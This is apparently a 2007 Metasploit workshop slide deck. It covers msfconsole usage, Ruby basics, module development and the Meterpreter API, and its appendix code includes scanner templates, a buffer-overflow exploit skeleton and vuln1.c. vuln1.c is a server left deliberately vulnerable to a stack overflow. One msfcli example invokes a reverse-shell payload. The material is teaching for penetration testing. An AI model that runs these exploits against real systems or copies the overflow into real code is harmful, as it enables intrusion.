metasploit basics

EXPLOITATION FRAMEWORKS: THE METASPLOIT WORKSHOP

Upload: amiableindian

Post on 19-Jan-2015


Page 1: Metasploit Basics

EXPLOITATION FRAMEWORKS: THE METASPLOIT WORKSHOP

Page 2: Metasploit Basics

Exploitation Frameworks: Metasploit 3.x Workshop

Steven McGrath

What to Accomplish

Understanding Metasploit as a user

Understanding the basics of Ruby

Understanding Metasploit as a developer

Understanding Metasploit as an expert

What this is...

To help build a better understanding of Metasploit

To learn how to use the framework in exploit research

To learn how to use Metasploit in pen-testing.


Page 3: Metasploit Basics

What this is NOT...

l33t h@x0r class

Reasons why Metasploit is better than everything else...it isn’t

h@x0ring this network.

You should have...

Backtrack Image (supplied)

VMWare Player/Workstation/Fusion (supplied)

A laptop to run all of this on (NOT supplied)

Starting off

What is Metasploit?

How is it used?

What are other tools?

What benefits does Metasploit have?


Page 4: Metasploit Basics

What is it?

Metasploit is an exploitation framework, NOT a vulnerability scanner.

How is it used?

Primarily an aid in exploitation research.

Secondarily used in pen-testing.

What are other tools?

CORE Impact

CANVAS


Page 5: Metasploit Basics

Benefits?

Price

CORE Impact = $25,000 USD a year

CANVAS = $1244 USD + Support

Flexibility

Open Source = More Options

Downsides?

Flexibility

Most Metasploit payloads are Windows-specific.

Completeness

The framework is under active development, however there are still holes in the framework that need to be addressed.

Metasploit as a User


Page 6: Metasploit Basics

What to cover?

Control Interfaces

Basic usage

msfconsole

Primary interface into Metasploit

Shell-like (with readline)

Will run external commands

Dynamic interaction with Metasploit

Automation capable

msfconsole

Automation?

Automation is achieved through resource files. They contain a list of commands that msfconsole runs at startup, as if the user had typed them into the console.


Page 7: Metasploit Basics

msfconsole

Configuration files?

msfconsole can store per-user configuration data. By default this is kept in ~/.msf3.

msfconsole

Basic Commands:

set / unset

load / unload / loadpath

use / back

show / save

sessions / jobs / route

info / irb

check / exploit / run

msfconsole - set/unset

set - Sets a variable to the specified value. Also can show a list of variables that can be set when run alone.

unset - Will “unset” or remove the value from a variable or series of variables.

setg - Global equivalent of set.

unsetg - Global equivalent of unset.

NOTE: local variables will override globals.


Page 8: Metasploit Basics

msfconsole - load/unload

load - Will load a plugin from the framework. You can also pass values to optional variables at load.

unload - Will unload a plugin.

loadpath - Adds a module path for the framework to search and load modules. Useful for custom modules.

msfconsole - show/use

show - Will display lists of modules: auxiliary, exploits, payloads, encoders, and nops.

use - Use changes your context within the framework.

back - Returns you to the global context.

msfconsole - save

save - Saves your current state (e.g. current module and set variables)


Page 9: Metasploit Basics

msfconsole - sessions

sessions - Session interactions...

-i - Interacts with the specified session.

-l - Lists the active sessions.

msfconsole - jobs

jobs - Will display information about backgrounded jobs (typically client-side exploits)

-l - List the active jobs.

-k - Kills the specified job.

msfconsole - route

route - Allows you to interact with the framework routing table (useful in “pivoting”).


Page 10: Metasploit Basics

msfconsole - info

info - Will display information about the specified module(s).

msfconsole - irb

irb - Provides an interactive ruby shell into the framework. This is useful for live scripting and/or modification to code.

msfconsole - check/exploit

check - Checks to see if the specified target is vulnerable to an exploit.

exploit - Will launch an exploit on the specified target.

run - Will launch an auxiliary module against the specified target(s).

NOTE: Normally checks are not required to exploit a target.


Page 11: Metasploit Basics

msfconsole - rcheck/rexploit

rcheck - Will first reload the module from disk before running the check.

rexploit - Same as rcheck, but will launch the actual exploit.

msfcli

Commandline Interface

Arguments are passed to tell Metasploit what to do

Traditionally used for automation

msfcli

Example:

./msfcli exploit/example \
    RHOST=192.168.1.100 \
    LHOST=192.168.1.50 \
    PAYLOAD=windows/shell/reverse_tcp E


Page 12: Metasploit Basics

msfcli

./msfcli -h for more info

msfweb

Web Interface to Metasploit

Ruby on Rails application

The primary interface for Windows


Page 13: Metasploit Basics

msfgui

Still under HEAVY development

GTK GUI to Metasploit

Attempt to make Metasploit more like CANVAS and CORE from the User’s standpoint

msfd

Network daemon interface.

Listens on port 55554 for telnet connections.

Useful for sharing a running framework without the hassle of screen.

Pivot points

Exploits

Sessions


Page 14: Metasploit Basics

Before we continue...

From this point on we will be assuming msfconsole

Exploit Me!

Target: 10.0.0.5

Exploit Module to use: windows/smb/ms04_011_lsass

Payload: Anything you choose!

Feel free to ask your classmates and myself :)

Metasploit as a Developer


Page 15: Metasploit Basics

Metasploit as a Developer

This will be a hands-on workshop.

You WILL be writing your own exploit before we leave.

Due to constraints, we will focus on viewing a few example modules as code examples before the workshop portion.

Starting off...

Getting to know Ruby

A general understanding of how Metasploit 3.x is built

Example Code

Lab

Getting to know Ruby

Interpreted, not compiled.

Object Oriented by design

The Red-headed stepchild of Python, Perl, and SmallTalk


Page 16: Metasploit Basics

Getting to know Ruby

Hello World:

#!/usr/bin/env ruby

# This is the hello world Application

var1 = "Hello World!"
print "\n#{var1}\n"
print var1, "\n"

Getting to know Ruby - Lab

Extend the Basic TCP Server in your materials to respond to any input given.

Getting to know Ruby - Lab

require 'socket'

port = 44455
host = 'localhost'   # must be a string; a bare localhost is an undefined variable

server = TCPServer.new(host, port)

# Serve clients one after another; echo each line back with an "R: " prefix.
while (session = server.accept)
  while !session.eof?
    session.puts "R: #{session.gets}"
  end
end


Page 17: Metasploit Basics

Metasploit’s Structure - Dirs

data - Data files for the framework

documentation - Examples, Guides, etc.

external - Non-framework software

lib - Framework Libraries

modules - Module root for the framework

plugins - Plugin root for the framework

scripts - Script root for the framework

tools - Development tools

Metasploit’s Structure - Dirs

modules

auxiliary - Auxiliary module root

encoders - Encoder module root

exploits - Exploit module root

nops - NOP module root

payloads - Payload module root

Metasploit’s Structure

What is the difference between an exploit and an auxiliary module?

Exploit modules will actually deliver a payload

Auxiliary modules cover anything else


Page 18: Metasploit Basics

Metasploit’s Structure

Rex

Ruby Exploitation Library

Derived from Metasploit 2’s Pex libraries

Located in lib/rex

Rex is the base that most of the framework builds upon

Rex Subsystems

Architectures

Encoding

Exploitation

I/O

Logging

Nops

Non-Protocol Parsers

Payload Polymorphic Blocks

Post-Exploit Clients

Protocols

Services

Sockets

Text Manipulation

User Interface


Page 19: Metasploit Basics

Framework Core

Core interface into the framework

Handles the core aspects of the framework

Module interaction (loading, unloading, etc.)

Exploitation handling

Plugins

Sessions

Located under lib/msf/core

Framework Core Classes

Framework

Datastore

EncodedPayload

Module (Auxiliary, Encoder, Exploit, Nop, Payload)

EventDispatcher

ExploitDriver

Handler

OptionContainer

Plugin

Session

Framework Base

Thin interaction layer between Framework Core and Modules, Plugins, and User Interfaces


Page 20: Metasploit Basics

Digging In...

Now that we have a basic understanding of how the framework is built, it’s time to dig into the plugins and modules themselves...

Metasploit Plugins

Plugins extend the framework dynamically.

Plugins are NOT modules.

All of the User Interfaces are essentially plugins to the framework.

Metasploit Plugins

Example Plugins

msfd

Database support

Threading

Session hooks

Session taggers

IPS filters


Page 21: Metasploit Basics

Metasploit Plugins

module Msf
class Plugin::Example < Msf::Plugin

  # Methods mixed into the running Framework instance by this plugin
  module ExampleExtension
    def example_ext
      "This is a Test"
    end
  end

  def initialize(framework, options)
    framework.extend(ExampleExtension)
  end

end
end

Framework Modules

Modules are used for specific uses within the framework.

Modules use an extensible, well-defined interface for interaction within the framework.

All modules inherit from Msf::Module.

Metasploit Modules - Common Hash Keys

Name - String

Description - String

Version - String

Author - Array

Arch - Array

Platform - PlatformList

Ref - Array

License - String


Page 22: Metasploit Basics

Example Module

require 'msf/core'

module Msf
class Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary

  # Exploit mixins first, the Scanner mixin last
  include Exploit::Remote::Tcp
  include Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'HTTP Scanner',
      'Author'      => 'Maniac <[email protected]>',
      'Description' => %q{Scans for HTTP Servers in RHOSTS.}
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new("SENDSTRING", [ false, "String to send if port is open", "HEAD / HTTP/1.0\n\n" ])
      ], self.class
    )
  end

  # Called once per host in RHOSTS by the Scanner mixin
  def run_host(ip)
    connect
    sock.put(datastore['SENDSTRING'])
    data = sock.get_once
    # get_once returns nil when the peer sends nothing; to_s avoids a TypeError
    print_status(ip + "\nReceived: " + data.to_s + "\n")
    disconnect
  end

end
end
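The set/setg precedence rule from the msfconsole slides ("local variables will override globals") and the register_options call in the module above, modelled in plain Ruby as an added example. This is not Metasploit's own Datastore or OptionContainer code; the Option and Datastore classes, http_scanner_datastore and missing_required are names belonging to this example only, and the sample option set is constructed from the HTTP scanner slide plus RHOSTS.

```ruby
# Added example for this workshop page: a small model of how msfconsole's
# set/unset/setg/unsetg and a module's register_options interact.
# NOT Metasploit's own code; class and method names are this example's own.

class Option
  attr_reader :name, :required, :desc, :default

  # Mirrors the slide's OptString.new("SENDSTRING", [ false, desc, default ]):
  # a name, a required flag, a description and an optional default.
  def initialize(name, required, desc, default = nil)
    @name     = name.upcase
    @required = required
    @desc     = desc
    @default  = default
  end
end

class Datastore
  # +globals+ is a Hash shared by every module (what setg/unsetg edit);
  # the locals Hash is private to this module (what set/unset edit).
  def initialize(globals)
    @globals = globals
    @locals  = {}
    @options = {}
  end

  # Equivalent of the register_options([...], self.class) call in a module.
  def register_options(options)
    options.each { |opt| @options[opt.name] = opt }
  end

  def set(name, value)
    @locals[name.upcase] = value
  end

  def unset(name)
    @locals.delete(name.upcase)
  end

  def setg(name, value)
    @globals[name.upcase] = value
  end

  def unsetg(name)
    @globals.delete(name.upcase)
  end

  # Lookup order: module-local value, then global, then the registered default.
  # This is the "local variables will override globals" rule from the slides.
  def [](name)
    key = name.upcase
    return @locals[key]  if @locals.key?(key)
    return @globals[key] if @globals.key?(key)
    opt = @options[key]
    opt ? opt.default : nil
  end

  # Required options that still resolve to nil; an empty list means the
  # module can be run. This is the check the framework performs before
  # "run"/"exploit" is allowed to start.
  def missing_required
    @options.values.select { |opt| opt.required && self[opt.name].nil? }.map(&:name)
  end
end

# Constructed sample: the options the page's HTTP scanner registers, plus
# RHOSTS, which the Scanner mixin requires.
def http_scanner_datastore(globals = {})
  ds = Datastore.new(globals)
  ds.register_options([
    Option.new('RHOSTS',     true,  'Target address range'),
    Option.new('RPORT',      true,  'Target port', 80),
    Option.new('SENDSTRING', false, 'String to send if port is open', "HEAD / HTTP/1.0\n\n"),
  ])
  ds
end
```

Two modules built on the same globals Hash both see a value stored with setg, a value stored with set is visible only in the module it was set in, and unset reveals the global underneath again; missing_required reports RHOSTS until one of the two layers supplies it.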

Framework Modules - Lab

Use the Lab module template and extend it to buffer overflow with the following information

Host: 10.0.0.5

Return: 0xbfbfed20

76 Bytes + [target.ret].pack('V') + payload.encode


Page 23: Metasploit Basics

Metasploit as an Expert

Tasty Good Stuff!

Automation

Metaterpreter

Attack Automation


Page 24: Metasploit Basics

Attack Automation

Attack automation can happen in a number of different ways:

Pseudo-Automated

Full Automation

Pseudo-Automation

Resource Files for msfconsole.

Custom shell scripts that interact with msfcli.

Custom auxiliary modules.

db_autopwn

Existing Nessus Data

Existing Nmap Data

Full Automation

db_autopwn

db_nmap - Will scan a network with nmap and then exploit based on what it put into the database.


Page 25: Metasploit Basics

Metaterpreter

Metaterpreter

Extensible - extensions can be written to enhance metaterpreter.

Powerful - Flexible protocol and channelized communication.

Stealthy - No disk access and no new process.

In Memory DLL injection

Metaterpreter - OMGWTF!

This is how it works:

1. Metasploit sends first stage payload.

2. Payload talks back to Metasploit.

3. Metasploit sends second stage containing a DLL injection payload.

4. Metasploit sends the metaterpreter server DLL.

5. DLL injection payload loads the server DLL in memory.

6. Metaterpreter client and server communicate over the established channels.


Page 26: Metasploit Basics

Metaterpreter - UI

client.ui

Method Description

disable_keyboard Disables the Keyboard

disable_mouse Disables the Mouse

enable_keyboard Enables the Keyboard

enable_mouse Enables the Mouse

idle_time Returns idle time in seconds

Metaterpreter - Filesystem

client.fs.dir

Method Description

chdir(path) Change Directories

delete(path) Delete Directory

download(dst, src, recursive) Download Content to Local

entries(path) Show Contents of Directory

getwd Get the Working Directory

mkdir(path) Make Directory

upload(dst, src, recursive) Upload Content to Host

Metaterpreter - Filesystem

client.fs.file

Method Description

download(dest, files) Downloads Files to Local

expand_path(path) Expands Env Strings in Path

stat(path) Returns info on file

upload(dest, files) Uploads Files to Remote


Page 27: Metasploit Basics

Metaterpreter - Filesystem

client.fs.file.new

Method Description

(file, [r,w]) Opens file

close Closes file

read(length) Reads X bytes from file

seek(offset, whence) Seeks to offset in file

write(buffer) Writes buffer to the file

Metaterpreter - Networking

client.net.config

Method Description

add_route(s, n, g) Adds route

each_interface Displays interfaces

each_route Displays routes

get_interfaces Returns array of interfaces

get_routes Returns array of routing table

remove_route(s, n, g) Removes route

Metaterpreter - Config

client.sys.config

Method Description

getuid Returns Process UID

revert_to_self Calls RevertToSelf

sysinfo Returns System Name and Host Information


Page 28: Metasploit Basics

Metaterpreter - Power

client.sys.power

Method Description

reboot(reason) Reboots Host

shutdown(force, reason) Shuts down Host

Metaterpreter - Processes

client.sys.process

Method Description

each_process Displays running processes

execute(path, args, opts) Executes binary

getpid Returns current process

kill(pid) Kills process

processes Returns array of processes

open(pid, perms) Opens process

Metaterpreter - Registry

client.sys.registry

Method Description

close_key(hk) Closes an open key

create_key(hk, bk, perm) Creates new key

delete_key(hk, bk, recursive) Deletes key

delete_value(hk, name) Deletes reg value

enum_key(hk) Returns array of subkeys

open_key(hk, bk, perm) Opens a reg key

query_value(hk, name) Returns reg value

set_value(hk, name, type, val) Sets reg value


Page 29: Metasploit Basics

Metaterpreter - Memory

process.memory

Method Description

allocate(len, prot, base) Allocates memory

free(base, len) Deallocates memory

lock(base, len) Lock pages in memory

protect(base, len, prot) Changes page protection

query(base) Queries info on an address

read(base, len) Reads memory

write(base, len) Writes memory

Metaterpreter - Threads

process.thread

Method Description

create(entry, param) Creates a new thread

each_thread Displays running threads

get_threads Returns array of threads

Metaterpreter - Images

process.image

Method Description

each_image Displays loaded images

get_images Returns array of images

get_procedure_address(b, n) Gets address of procedure

load(path) Loads DLL

unload(base) Unloads DLL


Page 30: Metasploit Basics

Q&A


Page 31: Metasploit Basics

maniac_scanner.rb 2007-09-04

require 'msf/core'

module Msf

class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary

  # Exploit mixins should be added first
  include Exploit::Remote::Tcp

  # Scanner mixin should be included last
  include Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Generic Scanner Template',
      'Author'      => 'Maniac <[email protected]>',
      'Description' => %q{
        Connect to every host specified in the RHOSTS network range,
        send a probe, read a response, and print that response to
        the screen.
      }
    )

    register_options(
      [
        # Specify the predefined RPORT option
        Opt::RPORT(25),

        # Specify a new option containing the string to send to the server
        OptString.new("SENDSTRING", [ false, "The string to send", "HEAD / HTTP/1.0\n\n" ])
      ], self.class)
  end

  # Work with a single IP address at a time
  def run_host(ip)
    # Call the connect() method provided by the TCP mixin
    # This is equivalent to connect()
    connect

    sock.put(datastore['SENDSTRING'])
    data = sock.get_once
    # get_once returns nil if the peer sends nothing before closing
    print_status(ip + " Received: " + data.to_s)

    # Call the disconnect() method provided by the TCP mixin
    # This is equivalent to disconnect()
    disconnect
  end

end
end

Page 33: Metasploit Basics

2007-09-05

#!/usr/bin/env ruby

##### Example TCP Server Lab #####
# In this lab you will be modifying the
# code to return any input to the client.

require 'socket'

# Let's define the port and host.
port = 44455
host = 'localhost'   # a string; a bare localhost would be an undefined variable

# Create a new server connection.
server = TCPServer.new(host, port)

# Let's stay active as long as we are
# accepting connections.
while (session = server.accept)

  # As long as we do not terminate
  # our client, let's stay within this
  # context.
  while !session.eof?

    # Something should go here ;)

  end
end
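A worked solution to the TCP server lab above (the same template appears on the "Getting to know Ruby - Lab" slides), added here as an example; it is not taken from the workshop materials. echo_session, start_echo_server and echo_roundtrip are this example's own names. The echo logic is separated from the accept loop so it can be exercised against any IO pair, and the server binds 127.0.0.1 on an ephemeral port (port 0) instead of the lab's fixed 44455 so it runs without assumptions about free ports.

```ruby
require 'socket'
require 'stringio'

# Added example for the "Getting to know Ruby" lab; not part of the workshop
# materials. Function names below are this example's own.

# Echo every line read from +input+ back on +output+, prefixed with "R: ".
# Returns the number of lines echoed. A final line that arrives without a
# trailing newline (client closed mid-line) is still echoed and terminated;
# the lab's "R: #{session.gets}" one-liner would emit it unterminated.
def echo_session(input, output = input)
  count = 0
  until input.eof?          # blocks until data arrives or the peer closes
    line = input.gets
    break if line.nil?
    output.puts "R: #{line.chomp}"
    count += 1
  end
  count
end

# Start an echo server on host:port (port 0 = ephemeral, chosen by the OS).
# Returns [server, port, acceptor_thread]; each client is served on its own
# thread, so one slow client does not block the accept loop as the lab's
# single-threaded version does.
def start_echo_server(host = '127.0.0.1', port = 0)
  server = TCPServer.new(host, port)
  acceptor = Thread.new do
    loop do
      session = server.accept
      Thread.new(session) do |s|
        begin
          echo_session(s)
        ensure
          s.close
        end
      end
    end
  end
  [server, server.addr[1], acceptor]
end

# Client side of the lab: send each line, collect the server's replies.
def echo_roundtrip(host, port, lines)
  client = TCPSocket.new(host, port)
  replies = lines.map do |l|
    client.puts l
    client.gets.chomp
  end
  client.close              # EOF on the server side ends echo_session
  replies
end
```

To use it interactively, call start_echo_server, note the returned port, and connect with a telnet or netcat client; every line typed comes back prefixed with "R: ". Stop it by killing the acceptor thread and closing the server.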

Page 34: Metasploit Basics

example.rb 2007-09-04

require 'msf/core'

module Msf

class Exploits::Linux::Example < Msf::Exploit::Remote

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Example Buffer Overflow Exploit',
      'Description'    => %q{
      },
      'Author'         => [ 'Maniac' ],
      'Arch'           => ARCH_X86,
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 4961 $',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 200,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'linux',
      'Targets'        =>
        [
          [ 'linux', { 'Ret' => 0xbfbfec80 } ],
        ],
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(5432),
      ], self.class)
  end

  # Lab template: sends a cyclic pattern so the crash offset can be found;
  # the lab replaces this with the real buffer layout.
  def exploit
    connect
    buf = pattern_create(2000)
    sock.put(buf)
    handler
    disconnect
  end

end
end

Page 36: Metasploit Basics

© 2006 [email protected] — available free from www.cenophobie.com/ruby

Predefined Variables

$! Exception information

$@ Array of backtrace

$& String of last match

$` String left of last match

$' Str right of last match

$+ Last group of last match

$N Nth group of last match

$~ Info about last match

$= Case insensitive flag

$/ Input record separator

$\ Output record separator

$, Output field separator

$. Line number of last file

$> Default output

$_ Last input line of string

$* Command line args

$0 Name of script

$$ Process number

$" Module names loaded

$stderr Standard error output

$stdin Standard input

$stdout Standard output

Reserved Words

alias

and

BEGIN

begin

break

case

class

def

defined?

do

else

elsif

END

end

ensure

false

for

if

in

module

next

nil

not

or

redo

rescue

retry

return

self

super

then

true

undef

unless

until

when

while

yield

Types

12345

123.45

1.23e-4

0xFF00

0b01100

1..5

1...5

'a'..'z'

'a'...'z'

'string sq'

"string dq"

"#{expr}"

"\t\r\n"

%q(string sq)

%Q(string dq)

%(string dq)

<<id string id

:symbol

/regex/opt

%r|regex|

[1, 2, 3]

%w(1 2 3)

%W(1 2 #{expr})

{1=>2, :s=>'v'}

Expressions

if expr [then] ... elsif expr [then] ... else ... end

unless expr [then] ... else ... end

expr if expr

expr unless expr

case expr when comp ... else ... end

while expr [do] ... end

until expr [do] ... end

do ... end while expr

do ... end until expr

for var in expr [do] ... end

expr.each [do] ... end

break next redo retry

Module/Class

module Name ... end

class Name ... end

class Name < Sup ... end

class << obj ... end

def name(args...) ... end

def inst.name(...) ... end

public protected private

attr_reader attr_writer attr attr_accessor

alias new old

Operators and Precedence

::

[]

**

+ - ! ~

* / %

<< >>

&

| ^

> >= < <=

<=> == === != =~

&&

.. ...

= ( += -= )

not

and or

Regex

. all characters

[ ] any single char in set

[^ ] any single char not in set

* zero or more

+ one or more

? zero or one

| alternation

( ) Group

^ Beginning of line or str

$ End of line or string

{1,5} 1 to 5

\A Beginning of a string

\b Word boundary

\B Non-word boundary

\d digit, same as [0-9]

\D Non-digit

\s Whitespace

\S Non-whitespace

\w Word-character

\W Non-word-character

\z End of a string

\Z End of string, before nl

Variables

local

@instance

@@class

CONSTANT

Constants

__FILE__

__LINE__

ENV

ARGF

ARGV

Exceptions

begin ... rescue ex => var ... else ... ensure ... end

StandardError

ZeroDivisionError

RangeError

SecurityError

IOError

IndexError

RuntimeError

Ruby arguments

-c Check

-d Debug

-e One Line

-h Help

-n gets loop

-rL require L

-v verbose

-w warnings

-y comp debug

Page 37: Metasploit Basics

© 2006 [email protected] — available free from www.cenophobie.com/ruby

String

Str#[num, num/range/regx] -> str

Str#capitalize! -> string

Str#center (int [,str]) -> str

Str#chomp! ([str]) -> str

Str#count -> integer

Str#delete! ([string]) -> string

Str#downcase! -> string

Str#each ([str]) do |str| ... end

Str#each_line do |line| ... end

Str#gsub! (rgx) do |match| ... end

Str#include? (str) -> true / false

Str#index (str/reg [,off]) -> int

Str#insert (int, string) -> string

Str#length -> integer

Str#ljust (int [,padstr]) -> str

Str#rindex (str/reg [,off]) -> int

Str#rjust (int [,padstr]) -> str

Str#scan (rgx) do |match| ... end

Str#split (string) -> array

Str#strip! -> string

Str#sub! (rgx) do |match| ... end

Str#swapcase! -> string

Str#to_sym -> symbol

Str#tr! (string, string) -> string

Str#upcase! -> string

File

File#new (path, modestring)-> file

File#new (path, modestring) do |file| ... end

File#open (path, modestring) do |file| ... end

File#exist? (path) -> t or f

File#basename (path [,suffix]) -> string

File#delete (path, ...)

File#rename (old, new)

File#size (path) -> integer

r Read-only, from beginning

r+ Read-write, from beginning

w Write-only, trunc. / new

w+ Read-write, trunc. / new

a Write-only, from end / new

a+ Read-write, from end / new

b Binary (Windows only)

Array

Array::new (int [,obj]) -> array

Array#clear

Array#map! do |x| ... end

Array#delete (value) -> obj or nil

Array#delete_at (index)-> obj or n

Array#delete_if do |x| ... end

Array#each do |x| ... end

Array#flatten! -> array

Array#include? (value) -> t or f

Array#insert (idx, obj...)-> array

Array#join ([string]) -> string

Array#length -> integer

Array#pop -> obj or nil

Array#push (obj...) -> array

Object

Obj#class -> class

Obj#freeze -> object

Obj#frozen? -> true or false

Obj#inspect -> string

Obj#is_a? (class) -> true or false

Obj#methods -> array

Obj#respond_to? (sym) -> true or false

Obj#to_s -> string

Dir

Dir[string] -> array

Dir::chdir ([string])

Dir::delete (string)

Dir::entries (string) -> array

Dir::foreach (string) do |file| ... end

Dir::getwd -> string

Dir::mkdir (string)

Dir::new (string)

Dir::open (string) do |dir| .. end

Dir#close

Dir#pos -> integer

Dir#read -> string or nil

Dir#rewind

Hash

Hash#clear

Hash#delete (key) -> obj or nil

Hash#delete_if do |k, v| ... end

Hash#each do |k, v| ... end

Hash#has_key? (k) -> true or false

Hash#has_value? (v) -> t or f

Hash#index (value) -> key

Hash#keys -> array

Hash#length -> integer

Hash#select do |k, v| ... end -> array

Hash#values -> array

Test::Unit

assert (boolean [,msg])

assert_block (message) do ... end

assert_equal (expected, actual [,msg])

assert_in_delta (exp, act, dlt [,message])

assert_kind_of (klass, object [,msg])

assert_match (pattern, string [,msg])

assert_nil (object [,msg])

assert_no_match (pattern, string [,msg])

assert_not_equal (expected, actual [,msg])

assert_not_nil (object [,msg])

assert_not_same (expected, actual [,msg])

assert_respond_to(obj, method [,msg])

assert_same (expected, actual [,msg])

DateTime

DateTime::now

DateTime::parse (str)

DateTime::strptime (str, format)

DateTime#day

DateTime#hour

DateTime#leap?

DateTime#min

DateTime#month

DateTime#sec

DateTime#wday

DateTime#year

Kernel

block_given?

eval (str [,binding])

raise (exception [,string])

fork do ... end => fixnum or nil

proc do ... end => proc

print (obj)

warn (msg)

Ruby: www.ruby-lang.org

Doc: www.ruby-doc.org

Page 38: Metasploit Basics

vuln1.c 2007-09-04

#include <stdio.h>
#include <string.h>      /* memset */
#include <unistd.h>      /* read */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define LISTEN_PORT 5432

int main() {
  char buf[64];            /* 64-byte stack buffer */
  int sock;
  int peersock;
  struct sockaddr_in my_addr;
  int reuse = 1;

  if((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("socket");
    return(1);
  }

  if(setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)) == -1) {
    perror("setsockopt");
    return(1);
  }

  memset(&my_addr, 0, sizeof(my_addr));
  my_addr.sin_family = AF_INET;
  my_addr.sin_port = htons(LISTEN_PORT);
  if(bind(sock, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) {
    perror("bind");
    return(1);
  }

  if(listen(sock, 5) == -1) {
    perror("listen");
    return(1);
  }

  if((peersock = accept(sock, NULL, 0)) == -1) {
    perror("accept");
    return(1);
  }

  /* Deliberately vulnerable (this is the lab target): reads up to 4096
     bytes into the 64-byte buffer above, so a long message overwrites
     the saved return address on the stack. */
  if(read(peersock, buf, 4096) == -1) {
    perror("read");
    return(1);
  }

  return(0);
}